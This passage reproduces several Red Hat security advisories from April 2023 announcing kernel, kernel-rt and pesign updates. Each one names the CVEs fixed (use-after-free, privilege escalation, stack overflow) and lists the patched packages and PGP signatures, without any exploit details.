2HkK2RvVftM06R56RF2/RMTmIf6nbXO0d0unegB0RFk+wd1Q68/8osnYfsG/DFaK  
k3TMxoUX1IlWVdrxHvp8BswFc9wStM6bdGSXm47STQne1orr9iDXJMuq9KsD9ZBT  
9nvp/1gj/aLKNaCyH8LxgAKASR+KmtBQUAvV9RF0slNRkiDOGl2WwoZGYGA1uVp6  
azPCBxaE5NUiiWgAnVcYCQimQh7Joqcz0szw7BDHuaF2RziR+vo0DqDR7xNameTH  
dCfVA4WEMEE/jeb6XumN2uH+SktTrjaM1owIRj6kxp7U0WinajB3VVVahd31R8mi  
vcBom9i111Y=wiwd  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1588-01

Red Hat Security Advisory 2023-1556-01 - The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements. Issues addressed include a use-after-free vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: kernel-rt security and bug fix update  
Advisory ID:       RHSA-2023:1556-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1556  
Issue date:        2023-04-04  
CVE Names:         CVE-2023-0266 CVE-2023-0461  
====================================================================  
1. Summary:

An update for kernel-rt is now available for Red Hat Enterprise Linux 8.4  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Real Time EUS (v.8.4) - x86_64  
Red Hat Enterprise Linux Real Time for NFV EUS (v.8.4) - x86_64

3. Description:

The kernel-rt packages provide the Real Time Linux Kernel, which enables  
fine-tuning for systems with extremely high determinism requirements.

Security Fix(es):

* ALSA: pcm: Move rwsem lock inside snd_ctl_elem_read to prevent UAF  
(CVE-2023-0266)

* kernel: net/ulp: use-after-free in listening ULP sockets (CVE-2023-0461)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* kernel-rt RHEL-8.4: disable KASAN, KCSAN and UBSAN for kernel-rt  
(BZ#2165124)

* kernel-rt: update RT source tree to the RHEL-8.4.z16 source tree (async)  
(BZ#2183403)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2163379 - CVE-2023-0266 ALSA: pcm: Move rwsem lock inside snd_ctl_elem_read to prevent UAF  
2176192 - CVE-2023-0461 kernel: net/ulp: use-after-free in listening ULP sockets

6. Package List:

Red Hat Enterprise Linux Real Time for NFV EUS (v.8.4):

Source:  
kernel-rt-4.18.0-305.86.2.rt7.160.el8_4.src.rpm

x86_64:  
kernel-rt-4.18.0-305.86.2.rt7.160.el8_4.x86_64.rpm  
kernel-rt-core-4.18.0-305.86.2.rt7.160.el8_4.x86_64.rpm  
kernel-rt-debug-4.18.0-305.86.2.rt7.160.el8_4.x86_64.rpm  
kernel-rt-debug-core-4.18.0-305.86.2.rt7.160.el8_4.x86_64.rpm  
kernel-rt-debug-debuginfo-4.18.0-305.86.2.rt7.160.el8_4.x86_64.rpm  
kernel-rt-debug-devel-4.18.0-305.86.2.rt7.160.el8_4.x86_64.rpm  
kernel-rt-debug-kvm-4.18.0-305.86.2.rt7.160.el8_4.x86_64.rpm  
kernel-rt-debug-modules-4.18.0-305.86.2.rt7.160.el8_4.x86_64.rpm  
kernel-rt-debug-modules-extra-4.18.0-305.86.2.rt7.160.el8_4.x86_64.rpm  
kernel-rt-debuginfo-4.18.0-305.86.2.rt7.160.el8_4.x86_64.rpm  
kernel-rt-debuginfo-common-x86_64-4.18.0-305.86.2.rt7.160.el8_4.x86_64.rpm  
kernel-rt-devel-4.18.0-305.86.2.rt7.160.el8_4.x86_64.rpm  
kernel-rt-kvm-4.18.0-305.86.2.rt7.160.el8_4.x86_64.rpm  
kernel-rt-modules-4.18.0-305.86.2.rt7.160.el8_4.x86_64.rpm  
kernel-rt-modules-extra-4.18.0-305.86.2.rt7.160.el8_4.x86_64.rpm

Red Hat Enterprise Linux Real Time EUS (v.8.4):

Source:  
kernel-rt-4.18.0-305.86.2.rt7.160.el8_4.src.rpm

x86_64:  
kernel-rt-4.18.0-305.86.2.rt7.160.el8_4.x86_64.rpm  
kernel-rt-core-4.18.0-305.86.2.rt7.160.el8_4.x86_64.rpm  
kernel-rt-debug-4.18.0-305.86.2.rt7.160.el8_4.x86_64.rpm  
kernel-rt-debug-core-4.18.0-305.86.2.rt7.160.el8_4.x86_64.rpm  
kernel-rt-debug-debuginfo-4.18.0-305.86.2.rt7.160.el8_4.x86_64.rpm  
kernel-rt-debug-devel-4.18.0-305.86.2.rt7.160.el8_4.x86_64.rpm  
kernel-rt-debug-modules-4.18.0-305.86.2.rt7.160.el8_4.x86_64.rpm  
kernel-rt-debug-modules-extra-4.18.0-305.86.2.rt7.160.el8_4.x86_64.rpm  
kernel-rt-debuginfo-4.18.0-305.86.2.rt7.160.el8_4.x86_64.rpm  
kernel-rt-debuginfo-common-x86_64-4.18.0-305.86.2.rt7.160.el8_4.x86_64.rpm  
kernel-rt-devel-4.18.0-305.86.2.rt7.160.el8_4.x86_64.rpm  
kernel-rt-modules-4.18.0-305.86.2.rt7.160.el8_4.x86_64.rpm  
kernel-rt-modules-extra-4.18.0-305.86.2.rt7.160.el8_4.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-0266  
https://access.redhat.com/security/cve/CVE-2023-0461  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZCvqnNzjgjWX9erEAQji3hAAiJOllK9VciQkxLUO2WiKQB4mig+cDp8n  
1Zm4g3/zeZMyYPoLFK5UjqlGNx2Ir+JowUkNqZz0jLibhu1WgArykSeUPnilRbA+  
Sq/EDfTF8inG+j39aynJPRIaalHGvW6wYpSuQU/moA9bPUdNvY8G5A0d/gJZAsuc  
SYbc5ylut7aZXaHeI7oDkdQw/udJJcmuD/+HORP8JLQeNvnb8UJmrMU0hgsoqhr6  
nl3FfYUdiR5vriZNIbxeNS9PD7K+MPsEkW51xPYkw7CzpXMfgG8otZLTwQBOuS9P  
bIJicxp3Zhg2W5ho5pO0DjKPlaHlBX88QYx5VNlxM/KN9unESDI1KhChEUva9+Ck  
97iU7CfAZgDWJ2PMPyW3cS9Og3Efep9kW05OLWo/K7rrQlEiZ/4n/DhLxHnUSGhK  
tTUkFb/4fXXeTQ+HTBEuWGq7SGDgMsHRmpQOEXVwrqkatTgwaQ5t2r6ka6+QQzra  
h2D8/VRuo0jgswN2ftM/4kHvLvh97/Rgy/W4yy3FENu6Bem8MvVaSG2QiGoKLZZH  
bNXFzHNoEX7FeYwagGm8s2R7vhzm6LO0XV0uh+2lY0iXU0/6moYRzK0PmN+fIGJS  
eU7Oh0VUxkKKb9AQO4EEraQcuEuw7HQpZSG13M17h977KJU6kBmDWZ0pzLX+VMYd  
V88Bo6k9bAs=ZtTu  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1556-01

Red Hat Security Advisory 2023-1557-01 - The kernel packages contain the Linux kernel, the core of any Linux operating system. Issues addressed include a use-after-free vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: kernel security and bug fix update  
Advisory ID:       RHSA-2023:1557-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1557  
Issue date:        2023-04-04  
CVE Names:         CVE-2023-0266 CVE-2023-0461  
====================================================================  
1. Summary:

An update for kernel is now available for Red Hat Enterprise Linux 8.4  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat CodeReady Linux Builder EUS (v. 8.4) - aarch64, ppc64le, x86_64  
Red Hat Enterprise Linux BaseOS EUS (v.8.4) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

The kernel packages contain the Linux kernel, the core of any Linux  
operating system.

Security Fix(es):

* ALSA: pcm: Move rwsem lock inside snd_ctl_elem_read to prevent UAF  
(CVE-2023-0266)

* kernel: net/ulp: use-after-free in listening ULP sockets (CVE-2023-0461)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* RHEL8.4 - s390/kexec: fix ipl report address for kdump (BZ#2166298)

* Windows Server 2019 guest randomly pauses with "KVM: entry failed,  
hardware error 0x80000021" (BZ#2166370)

* net/mlx5e: Fix use-after-free when reverting termination table  
(BZ#2167642)

* net/ice: OP_SET_RSS_HENA command not supported with in-tree driver  
(BZ#2167712)

* Backport Request for locking/rwsem commits (BZ#2170941)

* ipv6 traffic stop when an sriov vf have ipv6 address (BZ#2172552)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2163379 - CVE-2023-0266 ALSA: pcm: Move rwsem lock inside snd_ctl_elem_read to prevent UAF  
2176192 - CVE-2023-0461 kernel: net/ulp: use-after-free in listening ULP sockets

6. Package List:

Red Hat Enterprise Linux BaseOS EUS (v.8.4):

Source:  
kernel-4.18.0-305.86.2.el8_4.src.rpm

aarch64:  
bpftool-4.18.0-305.86.2.el8_4.aarch64.rpm  
bpftool-debuginfo-4.18.0-305.86.2.el8_4.aarch64.rpm  
kernel-4.18.0-305.86.2.el8_4.aarch64.rpm  
kernel-core-4.18.0-305.86.2.el8_4.aarch64.rpm  
kernel-cross-headers-4.18.0-305.86.2.el8_4.aarch64.rpm  
kernel-debug-4.18.0-305.86.2.el8_4.aarch64.rpm  
kernel-debug-core-4.18.0-305.86.2.el8_4.aarch64.rpm  
kernel-debug-debuginfo-4.18.0-305.86.2.el8_4.aarch64.rpm  
kernel-debug-devel-4.18.0-305.86.2.el8_4.aarch64.rpm  
kernel-debug-modules-4.18.0-305.86.2.el8_4.aarch64.rpm  
kernel-debug-modules-extra-4.18.0-305.86.2.el8_4.aarch64.rpm  
kernel-debuginfo-4.18.0-305.86.2.el8_4.aarch64.rpm  
kernel-debuginfo-common-aarch64-4.18.0-305.86.2.el8_4.aarch64.rpm  
kernel-devel-4.18.0-305.86.2.el8_4.aarch64.rpm  
kernel-headers-4.18.0-305.86.2.el8_4.aarch64.rpm  
kernel-modules-4.18.0-305.86.2.el8_4.aarch64.rpm  
kernel-modules-extra-4.18.0-305.86.2.el8_4.aarch64.rpm  
kernel-tools-4.18.0-305.86.2.el8_4.aarch64.rpm  
kernel-tools-debuginfo-4.18.0-305.86.2.el8_4.aarch64.rpm  
kernel-tools-libs-4.18.0-305.86.2.el8_4.aarch64.rpm  
perf-4.18.0-305.86.2.el8_4.aarch64.rpm  
perf-debuginfo-4.18.0-305.86.2.el8_4.aarch64.rpm  
python3-perf-4.18.0-305.86.2.el8_4.aarch64.rpm  
python3-perf-debuginfo-4.18.0-305.86.2.el8_4.aarch64.rpm

noarch:  
kernel-abi-stablelists-4.18.0-305.86.2.el8_4.noarch.rpm  
kernel-doc-4.18.0-305.86.2.el8_4.noarch.rpm

ppc64le:  
bpftool-4.18.0-305.86.2.el8_4.ppc64le.rpm  
bpftool-debuginfo-4.18.0-305.86.2.el8_4.ppc64le.rpm  
kernel-4.18.0-305.86.2.el8_4.ppc64le.rpm  
kernel-core-4.18.0-305.86.2.el8_4.ppc64le.rpm  
kernel-cross-headers-4.18.0-305.86.2.el8_4.ppc64le.rpm  
kernel-debug-4.18.0-305.86.2.el8_4.ppc64le.rpm  
kernel-debug-core-4.18.0-305.86.2.el8_4.ppc64le.rpm  
kernel-debug-debuginfo-4.18.0-305.86.2.el8_4.ppc64le.rpm  
kernel-debug-devel-4.18.0-305.86.2.el8_4.ppc64le.rpm  
kernel-debug-modules-4.18.0-305.86.2.el8_4.ppc64le.rpm  
kernel-debug-modules-extra-4.18.0-305.86.2.el8_4.ppc64le.rpm  
kernel-debuginfo-4.18.0-305.86.2.el8_4.ppc64le.rpm  
kernel-debuginfo-common-ppc64le-4.18.0-305.86.2.el8_4.ppc64le.rpm  
kernel-devel-4.18.0-305.86.2.el8_4.ppc64le.rpm  
kernel-headers-4.18.0-305.86.2.el8_4.ppc64le.rpm  
kernel-modules-4.18.0-305.86.2.el8_4.ppc64le.rpm  
kernel-modules-extra-4.18.0-305.86.2.el8_4.ppc64le.rpm  
kernel-tools-4.18.0-305.86.2.el8_4.ppc64le.rpm  
kernel-tools-debuginfo-4.18.0-305.86.2.el8_4.ppc64le.rpm  
kernel-tools-libs-4.18.0-305.86.2.el8_4.ppc64le.rpm  
perf-4.18.0-305.86.2.el8_4.ppc64le.rpm  
perf-debuginfo-4.18.0-305.86.2.el8_4.ppc64le.rpm  
python3-perf-4.18.0-305.86.2.el8_4.ppc64le.rpm  
python3-perf-debuginfo-4.18.0-305.86.2.el8_4.ppc64le.rpm

s390x:  
bpftool-4.18.0-305.86.2.el8_4.s390x.rpm  
bpftool-debuginfo-4.18.0-305.86.2.el8_4.s390x.rpm  
kernel-4.18.0-305.86.2.el8_4.s390x.rpm  
kernel-core-4.18.0-305.86.2.el8_4.s390x.rpm  
kernel-cross-headers-4.18.0-305.86.2.el8_4.s390x.rpm  
kernel-debug-4.18.0-305.86.2.el8_4.s390x.rpm  
kernel-debug-core-4.18.0-305.86.2.el8_4.s390x.rpm  
kernel-debug-debuginfo-4.18.0-305.86.2.el8_4.s390x.rpm  
kernel-debug-devel-4.18.0-305.86.2.el8_4.s390x.rpm  
kernel-debug-modules-4.18.0-305.86.2.el8_4.s390x.rpm  
kernel-debug-modules-extra-4.18.0-305.86.2.el8_4.s390x.rpm  
kernel-debuginfo-4.18.0-305.86.2.el8_4.s390x.rpm  
kernel-debuginfo-common-s390x-4.18.0-305.86.2.el8_4.s390x.rpm  
kernel-devel-4.18.0-305.86.2.el8_4.s390x.rpm  
kernel-headers-4.18.0-305.86.2.el8_4.s390x.rpm  
kernel-modules-4.18.0-305.86.2.el8_4.s390x.rpm  
kernel-modules-extra-4.18.0-305.86.2.el8_4.s390x.rpm  
kernel-tools-4.18.0-305.86.2.el8_4.s390x.rpm  
kernel-tools-debuginfo-4.18.0-305.86.2.el8_4.s390x.rpm  
kernel-zfcpdump-4.18.0-305.86.2.el8_4.s390x.rpm  
kernel-zfcpdump-core-4.18.0-305.86.2.el8_4.s390x.rpm  
kernel-zfcpdump-debuginfo-4.18.0-305.86.2.el8_4.s390x.rpm  
kernel-zfcpdump-devel-4.18.0-305.86.2.el8_4.s390x.rpm  
kernel-zfcpdump-modules-4.18.0-305.86.2.el8_4.s390x.rpm  
kernel-zfcpdump-modules-extra-4.18.0-305.86.2.el8_4.s390x.rpm  
perf-4.18.0-305.86.2.el8_4.s390x.rpm  
perf-debuginfo-4.18.0-305.86.2.el8_4.s390x.rpm  
python3-perf-4.18.0-305.86.2.el8_4.s390x.rpm  
python3-perf-debuginfo-4.18.0-305.86.2.el8_4.s390x.rpm

x86_64:  
bpftool-4.18.0-305.86.2.el8_4.x86_64.rpm  
bpftool-debuginfo-4.18.0-305.86.2.el8_4.x86_64.rpm  
kernel-4.18.0-305.86.2.el8_4.x86_64.rpm  
kernel-core-4.18.0-305.86.2.el8_4.x86_64.rpm  
kernel-cross-headers-4.18.0-305.86.2.el8_4.x86_64.rpm  
kernel-debug-4.18.0-305.86.2.el8_4.x86_64.rpm  
kernel-debug-core-4.18.0-305.86.2.el8_4.x86_64.rpm  
kernel-debug-debuginfo-4.18.0-305.86.2.el8_4.x86_64.rpm  
kernel-debug-devel-4.18.0-305.86.2.el8_4.x86_64.rpm  
kernel-debug-modules-4.18.0-305.86.2.el8_4.x86_64.rpm  
kernel-debug-modules-extra-4.18.0-305.86.2.el8_4.x86_64.rpm  
kernel-debuginfo-4.18.0-305.86.2.el8_4.x86_64.rpm  
kernel-debuginfo-common-x86_64-4.18.0-305.86.2.el8_4.x86_64.rpm  
kernel-devel-4.18.0-305.86.2.el8_4.x86_64.rpm  
kernel-headers-4.18.0-305.86.2.el8_4.x86_64.rpm  
kernel-modules-4.18.0-305.86.2.el8_4.x86_64.rpm  
kernel-modules-extra-4.18.0-305.86.2.el8_4.x86_64.rpm  
kernel-tools-4.18.0-305.86.2.el8_4.x86_64.rpm  
kernel-tools-debuginfo-4.18.0-305.86.2.el8_4.x86_64.rpm  
kernel-tools-libs-4.18.0-305.86.2.el8_4.x86_64.rpm  
perf-4.18.0-305.86.2.el8_4.x86_64.rpm  
perf-debuginfo-4.18.0-305.86.2.el8_4.x86_64.rpm  
python3-perf-4.18.0-305.86.2.el8_4.x86_64.rpm  
python3-perf-debuginfo-4.18.0-305.86.2.el8_4.x86_64.rpm

Red Hat CodeReady Linux Builder EUS (v. 8.4):

aarch64:  
bpftool-debuginfo-4.18.0-305.86.2.el8_4.aarch64.rpm  
kernel-debug-debuginfo-4.18.0-305.86.2.el8_4.aarch64.rpm  
kernel-debuginfo-4.18.0-305.86.2.el8_4.aarch64.rpm  
kernel-debuginfo-common-aarch64-4.18.0-305.86.2.el8_4.aarch64.rpm  
kernel-tools-debuginfo-4.18.0-305.86.2.el8_4.aarch64.rpm  
kernel-tools-libs-devel-4.18.0-305.86.2.el8_4.aarch64.rpm  
perf-debuginfo-4.18.0-305.86.2.el8_4.aarch64.rpm  
python3-perf-debuginfo-4.18.0-305.86.2.el8_4.aarch64.rpm

ppc64le:  
bpftool-debuginfo-4.18.0-305.86.2.el8_4.ppc64le.rpm  
kernel-debug-debuginfo-4.18.0-305.86.2.el8_4.ppc64le.rpm  
kernel-debuginfo-4.18.0-305.86.2.el8_4.ppc64le.rpm  
kernel-debuginfo-common-ppc64le-4.18.0-305.86.2.el8_4.ppc64le.rpm  
kernel-tools-debuginfo-4.18.0-305.86.2.el8_4.ppc64le.rpm  
kernel-tools-libs-devel-4.18.0-305.86.2.el8_4.ppc64le.rpm  
perf-debuginfo-4.18.0-305.86.2.el8_4.ppc64le.rpm  
python3-perf-debuginfo-4.18.0-305.86.2.el8_4.ppc64le.rpm

x86_64:  
bpftool-debuginfo-4.18.0-305.86.2.el8_4.x86_64.rpm  
kernel-debug-debuginfo-4.18.0-305.86.2.el8_4.x86_64.rpm  
kernel-debuginfo-4.18.0-305.86.2.el8_4.x86_64.rpm  
kernel-debuginfo-common-x86_64-4.18.0-305.86.2.el8_4.x86_64.rpm  
kernel-tools-debuginfo-4.18.0-305.86.2.el8_4.x86_64.rpm  
kernel-tools-libs-devel-4.18.0-305.86.2.el8_4.x86_64.rpm  
perf-debuginfo-4.18.0-305.86.2.el8_4.x86_64.rpm  
python3-perf-debuginfo-4.18.0-305.86.2.el8_4.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-0266  
https://access.redhat.com/security/cve/CVE-2023-0461  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZCvqpNzjgjWX9erEAQhNnQ/6AnZAPNsQP57RzYKHpfsxGVnmstglO5F6  
sZKj5ws2E9G9aF23qbUK5nYW5tN2QUNtlQK7Ns1H6HcBKYp8iQrFaVAlaEKpby3F  
l9cHjajeHazw3KQd2OtgL34XnMjDDJulMZExgqJARG9sjjQDqUIOApq58Ly57xh/  
r2wUWqOlWh92B2P/W8Yd9fMNtapakCj9WdQKh2zl9ZMH7J715TIg821NDgHpbdHS  
T1oJAST44PoDW38v9W1HpeHz6/Dax0M9sdJa6JbqIxN9bK4+vi+9uaAIOR2GAG8n  
P4SsbXJewH4QRHzTawYg5QoCSc4CpkWbuhCsz1vH+PS43iZNDw5EAUJe/tjIshmb  
XvR49AywCGvLkMmHOuqn3bAHqwNdeQKx7fRuMU/wahE1nSDDkXPb9XocV6Hu1rur  
K1Z6tYpPXqTMpXKDEdRyiJXL1V96dYMehVqgPkTjdw1dYCEjI1Tjj+oewj4EJwMG  
qoW5mj6Hwi/AP0Oybi0LoL2usjB0y96X4fVb/B4qrmDMLHoz/nJacmTASmYnY19X  
WG4xzWwmCUfO3Jh7AVth7fBqZmTik0+Lj+0T417QsZ73vAJ75OzGjzSN4GYeASUr  
KD3PJNMq0BJ8XnpkLqJm65CvmRHJnrix6M+AzsSIKFnAyhKTvUeCeY9eVqmFhcEd  
KO+uCDHR3AIÏpp  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1557-01

Red Hat Security Advisory 2023-1586-01 - The pesign packages provide the pesign utility for signing UEFI binaries as well as other associated tools. Issues addressed include a privilege escalation vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: pesign security update  
Advisory ID:       RHSA-2023:1586-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1586  
Issue date:        2023-04-04  
CVE Names:         CVE-2022-3560  
====================================================================  
1. Summary:

An update for pesign is now available for Red Hat Enterprise Linux 8.1  
Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream E4S (v. 8.1) - aarch64, x86_64

3. Description:

The pesign packages provide the pesign utility for signing UEFI binaries as  
well as other associated tools.

Security Fix(es):

* pesign: Local privilege escalation on pesign systemd service  
(CVE-2022-3560)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2135420 - CVE-2022-3560 pesign: Local privilege escalation on pesign systemd service

6. Package List:

Red Hat Enterprise Linux AppStream E4S (v. 8.1):

Source:  
pesign-0.112-25.el8_1.1.src.rpm

aarch64:  
pesign-0.112-25.el8_1.1.aarch64.rpm  
pesign-debuginfo-0.112-25.el8_1.1.aarch64.rpm  
pesign-debugsource-0.112-25.el8_1.1.aarch64.rpm

x86_64:  
pesign-0.112-25.el8_1.1.x86_64.rpm  
pesign-debuginfo-0.112-25.el8_1.1.x86_64.rpm  
pesign-debugsource-0.112-25.el8_1.1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-3560  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZCvqnNzjgjWX9erEAQiWzA/+OfCZ8FqHTlCqshqwNyOQsZXODIZaJ27z  
Z9l2yvVBtOQ1YuH8g5DiQnqSpQzzn8mLMLi5tNnLMnvAq9AvtVUIVQVM55CoXXkJ  
I234s7rk3zPy0XZseb0BJGw2Zw/bbSSNFY65dVeAsPZwYYNxfCB5v0/3pOxdOezN  
GpsusEpyYSEAuLTN2WSAUywndsUPHHUQ7cV4YaM51IJmUu6VWCvEmawi3jqXpptT  
lNVys6F/pmypMwwshb9d3Q3V8qph6v1PnGwRzuiYqvB3MHdAYff7XWvNmwU1Mskn  
1sPN9Ot642t4hhPLWWVqj4oMz3RElFT594oKU3HG2GeWo4yQq5vmgXmrKRGxT6cy  
3Aqa1VOgjRRtL7xsA96PmC7mniqX1+7wKHYRz1gDPMiOQ9n+iwi37NBwUZjRCAZd  
N6Fn8+RkE7aFYx07PlET9apLhAMO6RvEKopE/Kx4iv9+sMWwjIvbgpCA3b8dKugO  
xn7tN20wYO3hUjgnFhdiNHiYuLT8Y3QW4wjhRvgdYX98L5pmeFvOiqzU7qIX32Dt  
Ow0R3MiN0qC4kd0ecgiNfRd3BAwGlu6lo16d34awUCBh9EX0Y4oXGWXzu4A1V/27  
w98c3GMAw5VC8rklDk+qiVgctbBknr7Y+Lm8rhfwN4lBziO2oZGhZaR/7T4f1olx  
t0peXK3PCkg=+vZz  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1586-01

Red Hat Security Advisory 2023-1584-01 - The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: kernel-rt security and bug fix update  
Advisory ID:       RHSA-2023:1584-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1584  
Issue date:        2023-04-04  
CVE Names:         CVE-2022-4269 CVE-2022-4378 CVE-2023-0266  
                   CVE-2023-0386  
====================================================================  
1. Summary:

An update for kernel-rt is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Real Time for NFV (v. 8) - x86_64  
Red Hat Enterprise Linux for Real Time (v. 8) - x86_64

3. Description:

The kernel-rt packages provide the Real Time Linux Kernel, which enables  
fine-tuning for systems with extremely high determinism requirements.

Security Fix(es):

* kernel: stack overflow in do_proc_dointvec and proc_skip_spaces  
(CVE-2022-4378)

* ALSA: pcm: Move rwsem lock inside snd_ctl_elem_read to prevent UAF  
(CVE-2023-0266)

* kernel: FUSE filesystem low-privileged user privileges escalation  
(CVE-2023-0386)

* kernel: net: CPU soft lockup in TC mirred egress-to-ingress action  
(CVE-2022-4269)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* Lazy irq_work does not raise softirq on PREEMPT_RT [rhel-8] (BZ#2172163)

* The latest RHEL 8.7.z3 kernel changes need to be merged into the RT  
source tree to keep source parity between the two kernels. (BZ#2172278)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2150272 - CVE-2022-4269 kernel: net: CPU soft lockup in TC mirred egress-to-ingress action  
2152548 - CVE-2022-4378 kernel: stack overflow in do_proc_dointvec and proc_skip_spaces  
2159505 - CVE-2023-0386 kernel: FUSE filesystem low-privileged user privileges escalation  
2163379 - CVE-2023-0266 ALSA: pcm: Move rwsem lock inside snd_ctl_elem_read to prevent UAF

6. Package List:

Red Hat Enterprise Linux Real Time for NFV (v. 8):

Source:  
kernel-rt-4.18.0-425.19.2.rt7.230.el8_7.src.rpm

x86_64:  
kernel-rt-4.18.0-425.19.2.rt7.230.el8_7.x86_64.rpm  
kernel-rt-core-4.18.0-425.19.2.rt7.230.el8_7.x86_64.rpm  
kernel-rt-debug-4.18.0-425.19.2.rt7.230.el8_7.x86_64.rpm  
kernel-rt-debug-core-4.18.0-425.19.2.rt7.230.el8_7.x86_64.rpm  
kernel-rt-debug-debuginfo-4.18.0-425.19.2.rt7.230.el8_7.x86_64.rpm  
kernel-rt-debug-devel-4.18.0-425.19.2.rt7.230.el8_7.x86_64.rpm  
kernel-rt-debug-kvm-4.18.0-425.19.2.rt7.230.el8_7.x86_64.rpm  
kernel-rt-debug-modules-4.18.0-425.19.2.rt7.230.el8_7.x86_64.rpm  
kernel-rt-debug-modules-extra-4.18.0-425.19.2.rt7.230.el8_7.x86_64.rpm  
kernel-rt-debuginfo-4.18.0-425.19.2.rt7.230.el8_7.x86_64.rpm  
kernel-rt-debuginfo-common-x86_64-4.18.0-425.19.2.rt7.230.el8_7.x86_64.rpm  
kernel-rt-devel-4.18.0-425.19.2.rt7.230.el8_7.x86_64.rpm  
kernel-rt-kvm-4.18.0-425.19.2.rt7.230.el8_7.x86_64.rpm  
kernel-rt-modules-4.18.0-425.19.2.rt7.230.el8_7.x86_64.rpm  
kernel-rt-modules-extra-4.18.0-425.19.2.rt7.230.el8_7.x86_64.rpm

Red Hat Enterprise Linux for Real Time (v. 8):

Source:  
kernel-rt-4.18.0-425.19.2.rt7.230.el8_7.src.rpm

x86_64:  
kernel-rt-4.18.0-425.19.2.rt7.230.el8_7.x86_64.rpm  
